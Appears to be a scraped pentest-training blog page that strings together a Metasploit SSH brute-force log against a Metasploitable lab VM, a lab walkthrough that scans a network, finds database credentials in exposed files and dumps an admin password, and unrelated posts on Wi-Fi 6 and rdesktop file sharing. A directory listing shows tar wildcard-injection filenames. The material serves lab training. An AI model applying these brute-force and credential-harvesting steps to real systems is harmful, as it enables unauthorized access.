[*] 192.168.6.45:22 - Starting bruteforce
[-] 192.168.6.45:22 - Failed: 'hackerboy:hackerbo'
[-] 192.168.6.45:22 - Failed: 'hackerboy:hacker'
[-] 192.168.6.45:22 - Failed: 'hackerboy:atul'
[-] 192.168.6.45:22 - Failed: 'hackerboy:atulthehackerboy'
[-] 192.168.6.45:22 - Failed: 'hackerboy:fadsg'
[-] 192.168.6.45:22 - Failed: 'hackerboy:fdasg'
[+] 192.168.6.45:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.6.25:42191 -> 192.168.6.45:22 ) at 2021-12-24 20:00:21 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > 

The password for the "msfadmin" user is attack. The tools have also provided an SSH shell.

Command

sessions

msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information                                Connection
  --  ----  ----         -----------                                ----------
  1         shell linux  SSH hackerboy:hackerboy (192.168.6.25:22)  192.168.6.25:41331 -> 192.168.6.25:22  (192.168.6.25)
  2         shell linux  SSH msfadmin:msfadmin (192.168.6.45:22)    192.168.6.25:42191 -> 192.168.6.45:22  (192.168.6.45)

msf6 auxiliary(scanner/ssh/ssh_login) > 

Metasploit framework takes more time for dictionary attacks in comparison to Hydra and Nmap.

We can use the credentials to access the target machine using the SSH command.

SSH to the target machine using the credentials of user "root".

Command

ssh msfadmin@192.168.6.45
<yes>
<attack>
id
whoami
ls -la


 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                             130 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ssh msfadmin@192.168.6.45                                                                                                   130 ⨯
The authenticity of host '192.168.6.45 (192.168.6.45)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:6: [hashed name]
    ~/.ssh/known_hosts:80: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.6.45' (RSA) to the list of known hosts.
msfadmin@192.168.6.45's password: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Fri Dec 24 09:17:35 2021
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$       
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ ls -la
total 68
drwxr-xr-x 7 msfadmin msfadmin 4096 2021-07-09 16:15 .
drwxrwxrwx 7 root     root     4096 2021-06-02 05:32 ..
lrwxrwxrwx 1 root     root        9 2012-05-14 00:26 .bash_history -> /dev/null
-rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:04 --checkpoint=1
-rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:03 --checkpoint-action=exec=sh test.sh
-rw-r--r-- 1 msfadmin msfadmin    0 2020-12-05 10:37 data.txt
drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc
drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconf
drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconfd
-rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html
-rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html.1
-rw-r--r-- 1 msfadmin msfadmin   14 2021-04-25 08:22 index.html.2
-rw------- 1 root     root     4174 2012-05-14 02:01 .mysql_history
-rw-r--r-- 1 msfadmin msfadmin  586 2010-03-16 19:12 .profile
-rwx------ 1 msfadmin msfadmin    4 2012-05-20 14:22 .rhosts
drwx------ 2 msfadmin msfadmin 4096 2020-12-05 10:18 .ssh
-rw-r--r-- 1 msfadmin msfadmin    0 2010-05-07 14:38 .sudo_as_admin_successful
-rw-r--r-- 1 msfadmin msfadmin   56 2021-06-02 06:03 test.sh
drwxr-xr-x 6 msfadmin msfadmin 4096 2010-04-27 23:44 vulnerable
msfadmin@metasploitable:~$ 

This is how we can launch dictionary attacks on services using Hydra, Nmap, and Metasploit.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

 

Representation

You are a Penetration Tester hired by the company AwdMgmt to perform security tests on their internal Web Application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope. You are sitting in the client corporate building, directly attached to the client network.

Objective

The Objectives of this our moto is to first find the web servers in the network that you are directly attached with this. Then to test the Web Application running on it in order to check if you can access restricted areas (such as the login page)!

Tools

The best tools for this lab are -

# Dirbuster
# mysql
# Web browser

Follow the Step -

1) Find all the machines in the network

2) Identify the machines role

3) Explore the web application

4) Find hidden files

5) Test the credentials found

6) Retrieve the correct admin password

Solutions steps

Find all the machines in the network

We first need to find the address of the corporate network we are connected to. We can do so by running ifconfig and checking the IP address of our tap0 interface.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig           
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 12329  bytes 1183972 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 12329  bytes 1183972 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.104.11.50  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::8cfa:99ff:fe9b:3351  prefixlen 64  scopeid 0x20<link>
        ether 8e:fa:99:9b:33:51  txqueuelen 1000  (Ethernet)
        RX packets 4679  bytes 256538 (250.5 KiB)
        RX errors 0  dropped 2  overruns 0  frame 0
        TX packets 5763  bytes 321536 (314.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.6.25  netmask 255.255.255.0  broadcast 192.168.6.255
        inet6 2409:4064:e0b:64bf:9407:d0bc:70d9:cc95  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 95039  bytes 105443523 (100.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 56428  bytes 9346057 (8.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

As we can see the target network is 10.104.11.0/24. Let's run nmap with -sn option order to discover all the available hosts on the network.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 10.104.11.0/24 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:28 IST
Nmap scan report for 10.104.11.96
Host is up (0.61s latency).
MAC Address: 00:50:56:A5:F5:80 (VMware)
Nmap scan report for 10.104.11.198
Host is up (0.64s latency).
MAC Address: 00:50:56:A5:F5:80 (VMware)
Nmap scan report for 10.104.11.50
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 14.65 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The previous command shows that there are only two hosts alive in the network: 10.104.11.96 and 0.104.11.198

Identify the machines role

Let us run nmap in order to gather information about the services listening on our targets. For this we will run a -sV scan as follows:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sV 10.104.11.96,198
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 19:29 IST
Nmap scan report for 10.104.11.96
Host is up (0.85s latency).                                                         
Not shown: 998 closed tcp ports (reset)                                        
PORT   STATE SERVICE VERSION                                       
22/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A5:03:17 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.104.11.198
Host is up (0.91s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.38-0+wheezy1
MAC Address: 00:50:56:A5:F5:80 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 143.46 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
└─$ 

From the results, we can see that the machine with IP address 10.104.11.96 is running Apache on port 80, meaning that it is probably hosting the internal web application, while the other machine (10.104.11.198) is running MySQL.

Since the scope of the engagement is to check if an attacker can access restricted areas of the web application, let's focus our tests on the machine 10.104.11.96.

Explore the web application

In order to inspect the web application we just need to type the IP address of the target machine into our browser.

If we inspect the web application, we can see that the \"Sign up\" page is not available, meaning that we cannot create a new user in order to access the restricted area.

Moreover, we do not have any valid credential to use and the form seems not vulnerable to any SQL injection attack.

Find hidden files

Since we do not want to bruteforce the login form, we can try to run discovery tools such as dirbuster in order to find hidden files that may help us with our goal.

Let us start dirbuster and run a scan using the directory-list-2.3.-small.txt file. After a minute or two, we should start getting some interesting results:

Here we can see that in the include folder there is a file named config.old. Let us inspect it and see if there is anything interesting in it:

As we can see, the file contains some database credentials! If you recall, in the previous steps we had found a machine running MySQL. Let us try a DB connection to this machine with the credentials just found:

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ mysql -u awd -pUcuijsQgGOFILdjdL8D -h 10.104.11.198
ERROR 1045 (28000): Access denied for user 'awd'@10.104.11.10' (using password: YES)
                                                                                                                                      
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$                                                                                                                             

>

Unfortunately, it seems that the credentials are not valid. Let us keep investigating the files found with dirbuster. If we check the previous screenshot, we can see that there is a page named signup.php that we were not able to access from the links in the web application:

This is even better than the previous file found!

Test the credentials found

Let us try the credentials found in the signup.php file and see if we are able to access the DB!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]                                                                
└─$                                                        130 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ mysql -u awdmgmt -pUChxKQk96dVtM07 -h 10.104.11.198               130 ⨯
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 241
Server version: 5.5.38-0+wheezy1 (Debian)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

As we can see, this time we are successfully logged into the database! Let us inspect it!

Retrieve the correct admin password

Let us use some simple mysql commands to navigate the database and check if there is anything interesting in it. First, we will have to select the database to use and then inspect its tables and data, as follows:

MySQL [(none)]> use awdmgmt_accounts;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts                   |
+----------------------------+
1 row in set (0.528 sec)

MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email              | password | displayname |
+----+--------------------+----------+-------------+
|  1 | admin@awdmgmt.labs | ENS7VvW8 | Admin       |
+----+--------------------+----------+-------------+
1 row in set (0.898 sec)

MySQL [awdmgmt_accounts]> 

With the information just obtained, let us try to log into the web application:

Disclaimer

Wifi 6

Hello Guys. In this blog we're going to talk about the 802.11ax wireless standard. Which is more commonly known as Wi-Fi 6. Now Wi-Fi 6 was released in 2019 and is the latest wireless standard that's used in wireless devices and is the successor to the 802.11ac Wi-Fi standard which is known as Wi-Fi 5.

Now Wi-Fi 6 is faster than Wi-Fi 5, however speed wasn't necessarily its main goal. The main goal of Wi-Fi 6 is not just an increase in speed but it was to make a Wi-Fi network perform better when a lot of devices are connected to it. And this is because today there are so many devices in our home that use Wi-Fi, such as computers, tablets, phones, security cameras, refrigerators, light switches, thermostats, and so much more. And with so many devices competing for the Wi-Fi signal, it can slow down a network because a Wi-Fi router can only communicate with so many devices at a time. 

So to meet this demand engineers developed Wi-Fi 6. So what are the differences between Wi-Fi 6 and Wi-Fi 5? Well one of those differences is obviously speed. The older Wi-Fi 5 had a maximum speed of 3.5 gigabits per second. But with Wi-Fi 6 that speed has been increased to 9.6 gigabits per second, which is a significant increase. Now keep in mind this increase in speed is shared across multiple devices. It does not mean that each of your devices will achieve this speed. And also this speed is on your local area network, meaning in your home or office. This does not mean that your internet speed will increase. However it  will make it seem like it's faster because of the technology that has been implemented in Wi-Fi 6. Now one of these technologies is orthogonal frequency-division multiple access or OFDMA.

Now this technology lowers latency and delivers data to multiple devices more   efficiently for example let's say that Wi-Fi transmissions act like carts that deliver data to Wi-Fi devices. And let's say you have three Wi-Fi devices. Now with the older Wi-Fi 5 a cart would deliver one piece of data to one device at a time.

So each Wi-Fi device would have to wait their turn to receive data. But with the newer Wi-Fi 6 each cart would carry three pieces of data that would deliver to each device at the same time. So with Wi-Fi 5 devices will have to wait their turn to receive data. But with Wi-Fi 6 they don't have to wait because they all receive data at the same time. So this makes more efficient use of data delivery which reduces lag and another technology that Wi-Fi 6 uses is MU-MIMO which stands for multiple-user, multiple-input, multiple-output. Now this technology first made its debut in Wi-Fi 5 version 2. And what this does is that it allows multiple wireless devices to communicate with a Wi-Fi router at the same time. Now before Wi-Fi 5 routers used SU-MIMO, which stands for Single-User MIMO. And this also allowed Wi-Fi routers to communicate with multiple devices but only with one device at a time. So each device will have to wait their turn to communicate with the router. But a router with MU-MIMO, all the devices that are connected won't have to wait their turn because this allows communication to multiple devices at the same time.  

It breaks up the internet bandwidth into individual streams and pushes it to the connected devices. So with this technology you'll see a significant improvement in the speed of your internet if you're doing things that require a lot of bandwidth such as streaming videos or downloading. So as I stated before MU-MIMO debuted in Wi-Fi 5 version 2, but it has improved in Wi-Fi 6. The difference is is that with Wi-Fi 5 it was only available in download and it can only support four simultaneous streams. But with Wi-Fi 6 it's available in both upload and download and it can support up to 12 simultaneous streams. And Wi-Fi 6 also has an improvement  in beamforming. Beamforming is a technique that sends transmissions in a specific direction  which strengthens the signal. But without beamforming, the transmission is sent in  every direction which can weaken the signal which is what happens in older routers. But with newer routers the signal is directed to the devices  that are connected to it. 

Wi-Fi 6 also has the ability to minimize interference from nearby networks. And it does this by using a technology called basic service set coloring. So for example when you have two Wi-Fi routers next to each other such as what happens with neighbors, the signals from the two networks can overlap and cause interference with the other signal. But Wi-Fi 6 with BSS coloring, it colors or marks the networks so it can distinguish another network from its own. It marks frames from nearby networks so that your router disregards them which
makes your Wi-Fi router more efficient because the less time a Wi-Fi router gets distracted the more responsive it can be. And as far as security, i-Fi 6 has the latest security protocol which is WPA3. WPA3 provides cutting edge security features that enable a more robust authentication that will increase protection from password guessing attempts.

And in order for a device to be Wi-Fi 6 certified it must have WPA3. Wi-Fi 6 also has the ability to extend the battery life in Wi-Fi devices. And it does this by using a technology called Target Wake Time. With Target Wake Time a router or an access point  schedules a time with Wi-Fi devices on when data is supposed to be sent or received. So according to that scheduled time when Wi-Fi devices are sending or receiving data, their antennas are powered on. But when they are not sending or receiving data they go into sleep mode and their antennas are powered off which saves battery life Now Wi-Fi routers will broadcast a wireless signal or frequency band so that wireless devices can connect to. And up until now they have been restricted to broadcasting two frequency bands. Which are 2.4 and 5 gigahertz. However with the new Wi-Fi 6E it'll broadcast a third band which is 6 gigahertz. The 6 gigahertz band opens up additional channels for delivering large amounts of data to Wi-Fi devices especially in crowded environments. These additional channels will result in a better network performance and a greater capacity to support more users. 

who would benefit from a Wi-Fi 6 router?

well if you have a lot of wireless devices, like perhaps 15 or more, then I would definitely recommend getting one especially if you have closer to 20 devices. Because you're going to see a big difference in the performance of your network. But you also have to keep in mind that in order to reap the full benefits of Wi-Fi 6, your devices must be compatible with Wi-Fi 6. 

Amazon Netgear wifi 6 router- https://amzn.to/30ymzoX

 

Disclaimer

File Transfer From Windows to Linux via rdesktop

The rdesktop tool is required for desktop management in a Windows box using Lyrics as the local machine you used.

Sometimes it's important to be able to exchange files from place to place using rdesktop even especially when there is no FTP service. It is our good fortune that we support file transfer mode using rdesktop tool.


Now, when connecting to Windows, we will use this kind of notation on the rdeskop arguments,

 

  
$ rdesktop  172.16.91.100 -r disk:linux=/home/hackerboy/Documents/ine-lab

 -f : this is not of importance in our case, it’s just for full screen mode, to enter and exit fullscreen mode, press Ctrl+Alt+Enter
 

 -r :  this is the remote share option. disk is one of the options available, this will create a disk on the network devices of the Windows box, named “linux” which will point to disk:linux=/home/hackerboy/Documents/ine-lab on our Linux box. Don’t forget that you need Windows XP and newer for this feature, and the device name is limited to 8 characters!


After connecting with these options, on your Windows box (via the rdesktop interface) go to this interface page...see the below..

Here you’ll find a device named linux on Kumar Atul Jaiswal, this is your /home/hackerboy/Documents/ine-lab folder!

The -r option of rdesktop support many redirections such as sound, printer,  clipboard and more. Check the manual pages for more detail.

Disclaimer